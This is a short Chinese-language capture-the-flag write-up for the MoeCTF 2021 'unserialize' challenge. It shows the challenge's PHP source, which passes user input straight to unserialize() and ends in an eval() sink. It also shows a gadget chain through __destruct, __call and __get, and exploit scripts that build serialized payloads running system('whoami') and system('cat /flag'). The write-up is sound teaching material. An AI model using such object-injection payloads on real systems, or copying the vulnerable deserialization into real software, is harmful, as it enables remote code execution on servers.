Problem: [MoeCTF 2021]unserialize
[[toc]]
很久没做php的反序列化了,找来复健一下
思路
- 解题大致思路
<?php class entrance { public $start; function __construct($start) { $this->start = $start; } function __destruct() { $this->start->helloworld(); } } class springboard { public $middle; function __call($name, $arguments) { echo $this->middle->hs; } } class evil { public $end; function __construct($end) { $this->end = $end; } function __get($Attribute) { eval($this->end); } } if(isset($_GET['serialize'])) { unserialize($_GET['serialize']); } else { highlight_file(__FILE__); }
源码如上所示
简单的链子
entrance::__destruct() -> springboard::__call -> evil::__get()
EXP
- 具体攻击代码
<?php
class entrance
{
public $start;
function __construct($start)
{
$this->start = $start;
}
function __destruct()
{
$this->start->helloworld();
}
}
class springboard
{
public $middle;
function __call($name, $arguments)
{
echo $this->middle->hs;
}
}
class evil
{
public $end;
function __construct($end)
{
$this->end = $end;
}
function __get($Attribute)
{
eval($this->end);
}
}
$a = new entrance(1);
$b = new springboard;
$c = new evil(1);
$c -> end = "system('whoami');";
$a -> start = $b;
$b -> middle = $c;
echo serialize($a);
获取flag
<?php
class entrance
{
public $start;
function __construct($start)
{
$this->start = $start;
}
function __destruct()
{
$this->start->helloworld();
}
}
class springboard
{
public $middle;
function __call($name, $arguments)
{
echo $this->middle->hs;
}
}
class evil
{
public $end;
function __construct($end)
{
$this->end = $end;
}
function __get($Attribute)
{
eval($this->end);
}
}
$a = new entrance(1);
$b = new springboard;
$c = new evil(1);
$c -> end = "system('cat /flag');";
$a -> start = $b;
$b -> middle = $c;
echo serialize($a);
//O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system('cat /flag');";}}}
总结
- 对该题的考点总结